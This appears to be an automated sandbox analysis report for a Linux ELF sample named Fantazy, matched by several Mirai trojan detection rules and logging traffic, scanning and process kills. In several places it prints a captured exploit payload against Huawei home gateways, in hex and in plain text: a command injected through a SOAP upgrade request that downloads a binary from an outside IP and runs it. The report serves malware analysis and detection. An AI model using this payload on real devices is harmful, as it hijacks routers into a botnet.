      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 472Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 31 34 39 2e 32 34 31 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 46 61 6e 74 61 7a 79 2f 46 61 6e 74 61 7a 79 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.149.241.90 -l /tmp/.oxy -r /Fantazy/Fantazy.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy Huawei.Selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: /usr/sbin/rsyslogd (PID: 6312)Reads hosts file: /etc/hostsJump to behavior
      Source: /usr/sbin/rsyslogd (PID: 6584)Reads hosts file: /etc/hostsJump to behavior
      Source: /usr/sbin/rsyslogd (PID: 6681)Reads hosts file: /etc/hostsJump to behavior
      Source: /usr/sbin/rsyslogd (PID: 6790)Reads hosts file: /etc/hosts
      Source: /usr/sbin/rsyslogd (PID: 6884)Reads hosts file: /etc/hosts
      Source: /usr/sbin/rsyslogd (PID: 6995)Reads hosts file: /etc/hosts
      Source: /lib/systemd/systemd-journald (PID: 6240)Socket: unknown address familyJump to behavior
      Source: /usr/sbin/gdm3 (PID: 6423)Socket: unknown address familyJump to behavior
      Source: /usr/bin/dbus-daemon (PID: 6453)Socket: unknown address familyJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6481)Socket: unknown address familyJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6590)Socket: unknown address familyJump to behavior
      Source: /usr/sbin/gdm3 (PID: 6662)Socket: unknown address familyJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6690)Socket: unknown address familyJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6795)Socket: unknown address family
      Source: /lib/systemd/systemd-journald (PID: 6889)Socket: unknown address family
      Source: /lib/systemd/systemd-journald (PID: 7000)Socket: unknown address family
      Source: unknownTCP traffic detected without corresponding DNS query: 183.204.106.95
      Source: unknownTCP traffic detected without corresponding DNS query: 201.49.66.7
      Source: unknownTCP traffic detected without corresponding DNS query: 112.100.211.87
      Source: unknownTCP traffic detected without corresponding DNS query: 53.219.159.191
      Source: unknownTCP traffic detected without corresponding DNS query: 188.250.172.71
      Source: unknownTCP traffic detected without corresponding DNS query: 165.127.40.182
      Source: unknownTCP traffic detected without corresponding DNS query: 31.205.123.116
      Source: unknownTCP traffic detected without corresponding DNS query: 69.82.173.226
      Source: unknownTCP traffic detected without corresponding DNS query: 149.220.173.4
      Source: unknownTCP traffic detected without corresponding DNS query: 23.13.124.124
      Source: unknownTCP traffic detected without corresponding DNS query: 60.83.103.42
      Source: unknownTCP traffic detected without corresponding DNS query: 96.161.122.251
      Source: unknownTCP traffic detected without corresponding DNS query: 203.132.56.82
      Source: unknownTCP traffic detected without corresponding DNS query: 42.177.204.67
      Source: unknownTCP traffic detected without corresponding DNS query: 39.199.182.233
      Source: unknownTCP traffic detected without corresponding DNS query: 217.39.19.227
      Source: unknownTCP traffic detected without corresponding DNS query: 44.55.32.207
      Source: unknownTCP traffic detected without corresponding DNS query: 89.27.202.147
      Source: unknownTCP traffic detected without corresponding DNS query: 182.158.194.199
      Source: unknownTCP traffic detected without corresponding DNS query: 122.130.121.252
      Source: unknownTCP traffic detected without corresponding DNS query: 63.219.239.161
      Source: unknownTCP traffic detected without corresponding DNS query: 13.79.235.101
      Source: unknownTCP traffic detected without corresponding DNS query: 61.101.193.72
      Source: unknownTCP traffic detected without corresponding DNS query: 203.99.76.96
      Source: unknownTCP traffic detected without corresponding DNS query: 81.152.188.185
      Source: unknownTCP traffic detected without corresponding DNS query: 96.249.194.161
      Source: unknownTCP traffic detected without corresponding DNS query: 122.81.238.41
      Source: unknownTCP traffic detected without corresponding DNS query: 112.143.124.103
      Source: unknownTCP traffic detected without corresponding DNS query: 154.187.153.46
      Source: unknownTCP traffic detected without corresponding DNS query: 163.9.31.33
      Source: unknownTCP traffic detected without corresponding DNS query: 115.224.16.130
      Source: unknownTCP traffic detected without corresponding DNS query: 100.51.118.112
      Source: unknownTCP traffic detected without corresponding DNS query: 62.221.195.170
      Source: unknownTCP traffic detected without corresponding DNS query: 130.227.26.12
      Source: unknownTCP traffic detected without corresponding DNS query: 174.151.102.200
      Source: unknownTCP traffic detected without corresponding DNS query: 70.144.123.171
      Source: unknownTCP traffic detected without corresponding DNS query: 75.212.176.121
      Source: unknownTCP traffic detected without corresponding DNS query: 148.118.231.188
      Source: unknownTCP traffic detected without corresponding DNS query: 63.138.15.160
      Source: unknownTCP traffic detected without corresponding DNS query: 58.117.152.149
      Source: unknownTCP traffic detected without corresponding DNS query: 221.69.127.6
      Source: unknownTCP traffic detected without corresponding DNS query: 188.120.176.37
      Source: unknownTCP traffic detected without corresponding DNS query: 76.192.122.252
      Source: unknownTCP traffic detected without corresponding DNS query: 58.203.234.227
      Source: unknownTCP traffic detected without corresponding DNS query: 116.157.43.96
      Source: unknownTCP traffic detected without corresponding DNS query: 159.244.221.197
      Source: unknownTCP traffic detected without corresponding DNS query: 109.55.228.43
      Source: unknownTCP traffic detected without corresponding DNS query: 87.187.1.120
      Source: unknownTCP traffic detected without corresponding DNS query: 167.50.74.92
      Source: unknownTCP traffic detected without corresponding DNS query: 121.112.70.139
      Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
      Source: unknownHTTP traffic detected: POST /9aadafe2051348cd32033e1cad68f0a5fe46fba3240ac1e6e42158f31b8a1371790c09baf3996b4979fe8e533446c7dedf30f654c68b25357334c66911dc6a9e HTTP/1.1Host: daisy.ubuntu.comAccept: */*Content-Type: application/octet-streamX-Whoopsie-Version: 0.2.69ubuntu0.3Content-Length: 164887Expect: 100-continue
      Source: Fantazy.i486.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: Fantazy.i486.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
      Source: syslog.365.dr, syslog.179.dr, syslog.275.dr, syslog.301.dr, syslog.32.dr, syslog.213.drString found in binary or memory: https://www.rsyslog.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40158 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40158

      System Summary

      barindex
      Source: Fantazy.i486.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_aa39fb02 Author: unknown
      Source: Fantazy.i486.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_3a56423b Author: unknown
      Source: Fantazy.i486.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_575f5bc8 Author: unknown
      Source: Fantazy.i486.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6e8e9257 Author: unknown
      Source: Fantazy.i486.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_dab39a25 Author: unknown
      Source: 6219.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_aa39fb02 Author: unknown
      Source: 6219.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_3a56423b Author: unknown
      Source: 6219.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_575f5bc8 Author: unknown
      Source: 6219.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6e8e9257 Author: unknown
      Source: 6219.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_dab39a25 Author: unknown
      Source: 6217.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_aa39fb02 Author: unknown
      Source: 6217.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_3a56423b Author: unknown
      Source: 6217.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_575f5bc8 Author: unknown
      Source: 6217.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6e8e9257 Author: unknown
      Source: 6217.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_dab39a25 Author: unknown
      Source: 6216.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_aa39fb02 Author: unknown
      Source: 6216.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_3a56423b Author: unknown
      Source: 6216.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_575f5bc8 Author: unknown
      Source: 6216.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6e8e9257 Author: unknown
      Source: 6216.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_dab39a25 Author: unknown
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 491, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 658, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 720, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 721, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 759, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 761, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 772, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 774, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 777, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 785, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 793, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 936, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 1334, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 1335, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 1344, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 1601, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 1860, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 1872, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 1886, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 2048, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6043, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6191, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6192, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6240, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6302, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6305, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6306, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6312, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6385, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6481, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6496, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6498, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6584, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6588, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6590, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6591, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6598, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6603, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6662, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6681, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6687, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6690, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6692, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6696, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6701, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6759, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6760, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6790, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6794, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6795, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6801, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6806, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6834, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6866, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6881, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6884, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6888, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6889, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6890, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6895, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6959, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6960, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6991, result: successfulJump to behavior
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.149.241.90 -l /tmp/.oxy -r /Fantazy/Fantazy.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy Huawei.Selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.149.241.90 -l /tmp/.oxy -r /Fantazy/Fantazy.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy Huawei.Selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 491, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 658, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 720, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 721, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 759, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 761, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 772, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 774, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 777, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 785, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 793, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 936, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 1334, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 1335, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 1344, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 1601, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 1860, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 1872, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 1886, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 2048, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6043, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6191, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6192, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6240, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6302, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6305, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6306, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6312, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6385, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6481, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6496, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6498, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6584, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6588, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6590, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6591, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6598, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6603, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6662, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6681, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6687, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6690, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6692, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6696, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6701, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6759, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6760, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6790, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6794, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6795, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6801, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6806, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6834, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6866, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6881, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6884, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6888, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6889, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6890, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6895, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6959, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6960, result: successfulJump to behavior
      Source: /tmp/Fantazy.i486.elf (PID: 6220)SIGKILL sent: pid: 6991, result: successfulJump to behavior
      Source: Fantazy.i486.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_aa39fb02 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b136ba6496816ba9737a3eb0e633c28a337511a97505f06e52f37b38599587cb, id = aa39fb02-ca7e-4809-ab5d-00e92763f7ec, last_modified = 2021-09-16
      Source: Fantazy.i486.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_3a56423b os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 117d6eb47f000c9d475119ca0e6a1b49a91bbbece858758aaa3d7f30d0777d75, id = 3a56423b-c0cf-4483-87e3-552beb40563a, last_modified = 2021-09-16
      Source: Fantazy.i486.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_575f5bc8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 58e22a2acd002b07e1b1c546e8dfe9885d5dfd2092d4044630064078038e314f, id = 575f5bc8-b848-4db4-a99c-132d4d2bc8a4, last_modified = 2021-09-16
      Source: Fantazy.i486.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6e8e9257 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4bad14aebb0b8c7aa414f38866baaf1f4b350b2026735de24bcf2014ff4b0a6a, id = 6e8e9257-a6d5-407a-a584-4656816a3ddc, last_modified = 2021-09-16
      Source: Fantazy.i486.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_dab39a25 reference_sample = 3e02fb63803110cabde08e809cf4acc1b8fb474ace531959a311858fdd578bab, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 5a628d9af9d6dccf29e78f780bb74a2fa25167954c34d4a1529bdea5ea891ac0, id = dab39a25-852b-441f-86ab-23d945daa62c, last_modified = 2022-01-26
      Source: 6219.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_aa39fb02 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b136ba6496816ba9737a3eb0e633c28a337511a97505f06e52f37b38599587cb, id = aa39fb02-ca7e-4809-ab5d-00e92763f7ec, last_modified = 2021-09-16
